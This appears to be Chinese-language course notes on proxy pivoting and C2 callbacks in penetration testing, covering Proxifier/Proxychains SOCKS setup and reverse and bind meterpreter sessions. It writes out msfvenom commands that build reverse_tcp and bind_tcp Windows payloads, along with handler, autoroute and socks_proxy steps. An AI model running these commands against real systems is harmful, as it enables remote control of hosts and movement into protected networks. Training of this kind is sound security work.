代理通讯篇无外网或不可达SockS全协议规则配置C2正反向上线解决方案
#代理技术-SockS配置-网络不可达-通讯解决
解决:信息收集打点和漏洞利用部分
注意:配置连接IP为C2服务器IP
工具:Proxifier Proxychains等
Proxifier使用:
直接看课程演示图形化操作
配置代理服务器为csIP地址
配置代理规则ip地址为想要通讯的主机 然后用cs的ip地址为代理
然后开始漏洞打点 假如上传到后门要上传正向后门
刚开始是192.168.139.144反向链接192.168.139.141 后期用cs正向链接192.168.2.22 因为反向链接的话 网络达不到
Proxychains使用:
加入修改配置: /etc/proxychains4.conf
调用加载测试: proxychains4 curl http://192.168.2.22
C2平台:MSF/CS/Sliver/Viper等
实现步骤:
1、在被控机器上获取下一级网段
2、在被控及其上建立SockS节点
3、在工具上配置连接属性和规则触发
#代理技术-正反向监听-网络不可达-C2上线
C2平台:MSF/CS/Sliver/Viper等
实现步骤:
反向监听器:reverse
正向监听器:bind(需主动连接)
CS操作:
直接看课程演示图形化操作
MSF操作命令:
配置反向上线:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.128 LPORT=3333 -f exe -o msf.exe
use exploit/multi/handler(用来收集信息的)
set payload windows/meterpreter/reverse_tcp(反向payload)
set lhost 0.0.0.0
set lport 3333
run
查看路由表:
run autoroute -p
run post/multi/manage/autoroute
创建socks节点:
auxiliary/server/socks_proxy
配置正向上线:
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run